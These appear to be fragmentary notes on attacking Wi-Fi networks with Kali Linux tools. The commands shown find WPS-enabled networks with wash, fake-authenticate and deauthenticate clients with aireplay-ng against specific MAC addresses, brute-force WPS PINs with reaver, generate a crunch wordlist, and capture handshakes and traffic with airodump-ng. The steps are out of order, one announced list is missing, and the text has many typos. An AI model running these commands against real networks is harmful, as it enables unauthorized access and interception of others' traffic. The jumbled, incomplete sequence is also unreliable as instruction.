we will use a program named wash
root@kali:~# wash -i wlan0
where wlan0 is the wireless network interface
root@kali:~# aireplay-ng –fakeauth 30 -a E4:8F:34:37:BA:0C -h 7C:8B:CA:1B:D8:31 wlan0
root@kali:~# reaver –bssid E4:8F:34:37:BA:0C –channel 2 –interface wlan0 -vvv –no-associate
deauthentication to intercept the handshake:
root@kali:~# aireplay-ng –deauth 4 -a E4:8F:34:37:BA:0C -c 80:35:C1:52:D8:E3 wlan0
crunch 6 11
With a wireless adapter in monitor mode you are able to sniff packet in the air:
at least the one in our range
even if we are not connected to that network
even if it’s not directed to our PC
To do this we need airodump-ng command, part of the aircrack-ng suite.
It a program design to capture packet with a wireless adapter in monitor mode
Ex:
root@kali:~# airodump-ng wlan0
By default the airodum-ng shows only 2.4Ghz network frequency.
To get 5Ghz wireless frequency add –band a parameter, like this:
root@kali:~# airodump-ng --band a wlan0
Hte main bands are:
It’s possible to use more than one basnds in the command line. The following command will show both 2.4Ghz and 5Ghz wireless:
root@kali:~# airodump-ng --band abg wlan0
Save sniffed data into a file:
root@kali:~# airodump-ng --bssid E4:8F:34:37:BA:0C --channel 2 --write test wlan0
In this case we write into the “test” file all packets sniffed from network whic mac address is E4:8F:34:37:BA:0C and channel 2.
the encrypted data sent to and from that target network are saved into the “cap” file